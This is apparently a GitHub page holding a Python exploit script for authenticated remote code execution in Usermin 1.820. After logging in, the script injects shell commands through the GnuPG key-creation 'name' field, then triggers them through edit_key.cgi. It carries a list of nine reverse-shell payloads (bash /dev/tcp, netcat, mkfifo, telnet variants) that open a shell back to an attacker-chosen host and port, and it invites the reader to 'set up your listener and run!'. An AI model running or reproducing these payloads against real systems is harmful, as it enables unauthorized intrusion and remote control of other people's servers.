-
Notifications
You must be signed in to change notification settings - Fork 1
/
userminRCE.py
108 lines (86 loc) · 4.42 KB
/
userminRCE.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author: github.com/sergiovks AKA SezioS
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD -lh LHOST -lp LPORT
# https://youtu.be/wiRIWFAhz24
#This is a improved version of "twitter.com/numanturle" exploit, improved aspects are lhost and lport flags and a lot of reverse shell payloads that the victim executes, set up your listener and run!
import argparse
import requests
import warnings
import json
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
warnings.simplefilter('ignore', InsecureRequestWarning)
def init():
parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')
parser.add_argument('-u', '--host', help='Host', type=str, required=True)
parser.add_argument('-l', '--login', help='Username', type=str, required=True)
parser.add_argument('-p', '--password', help='Password', type=str, required=True)
parser.add_argument('-lh', '--lhost', help='LHOST', type=str, required=True)
parser.add_argument('-lp', '--lport', help='LPORT', type=int, required=True)
args = parser.parse_args()
exploit(args)
def exploit(args):
listen_ip = args.lhost
listen_port = args.lport
session = requests.Session()
target = "https://{}:20000".format(args.host)
username = args.login
password = args.password
print("[+] Target {}".format(target))
headers = {
'Cookie': 'redirect=1; testing=1;',
'Referer': target
}
login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user": username, "pass": password})
login_content = str(login.content)
search = "webmin_search.cgi"
check_login_string = re.findall(search, login_content)
if check_login_string:
session_hand_login = session.cookies.get_dict()
print("[+] Login successfully")
print("[+] Setup GnuPG")
commands = [
'bash -i >& /dev/tcp/{}/{lport} 0>&1'.format(listen_ip, lport=listen_port),
'0<&196;exec 196<>/dev/tcp/{}/{lport}; bash <&196 >&196 2>&196'.format(listen_ip, lport=listen_port),
'exec 5<>/dev/tcp/{}/{lport}; cat <&5 | while read line; do $line 2>&5 >&5; done'.format(listen_ip, lport=listen_port),
'bash -i 5<> /dev/tcp/{}/{lport} 0<&5 1>&5 2>&5'.format(listen_ip, lport=listen_port),
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {lhost} {lport} >/tmp/f'.format(lhost=listen_ip, lport=listen_port),
'nc {lhost} {lport} -e bash'.format(lhost=listen_ip, lport=listen_port),
'busybox nc {lhost} {lport} -e bash'.format(lhost=listen_ip, lport=listen_port),
'nc -c bash {lhost} {lport}'.format(lhost=listen_ip, lport=listen_port),
'TF=$(mktemp -u);mkfifo $TF && telnet {lhost} {lport} 0<$TF | bash 1>$TF'.format(lhost=listen_ip, lport=listen_port)
]
session.headers.update({'referer': target})
for command in commands:
payload = command
post_data = {
"name": '";{}echo "'.format(payload),
"email": "1337@webmin.com",
}
print("[+] Payload {}".format(post_data))
create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data)
create_secret_content = str(create_secret.content)
search = "successfully"
check_exp = re.findall(search, create_secret_content)
if check_exp:
print("[+] Setup successful")
print("[+] Fetching key list")
session.headers.update({'referer': target})
key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False)
last_gets_key = re.findall("edit_key.cgi\?(.*?)'", str(key_list.content))[-2]
print("[+] Key : {}".format(last_gets_key))
session.headers.update({'referer': target})
try:
key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3)
except requests.exceptions.ReadTimeout:
pass
print("[+] 5ucc355fully_3xpl017")
else:
print("[-] An unexpected error occurred")
else:
print("[-] AUTH: Login failed.")
if __name__ == "__main__":
init()